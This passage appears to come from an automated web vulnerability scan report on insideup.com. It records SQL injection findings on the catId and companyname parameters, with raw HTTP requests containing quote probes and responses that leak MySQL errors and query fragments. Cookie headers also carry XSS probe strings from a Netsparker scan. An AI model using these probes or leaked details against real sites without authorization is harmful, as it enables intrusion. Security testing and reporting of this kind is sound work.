s the first time&attributeId_392=1924__Yes&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:55:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pfk628jof1hiib0b20v8o3afi2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.221. http://www.insideup.com/ppc/leadflow/deco00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:04:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fh7693vh263mlbjj0sbr39u0e6; path=/
Content-Length: 2222
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/deco00/project.php?catId=30009'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009'&iusrc=iups' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009''&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:04:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3r00vmaa1dvisqt4g667uh1lo2; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/deco00/project.php was not found on this server.</p>

1.222. http://www.insideup.com/ppc/leadflow/deco00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:55:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dlk6q14e059n7s67lfip22e8s0; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
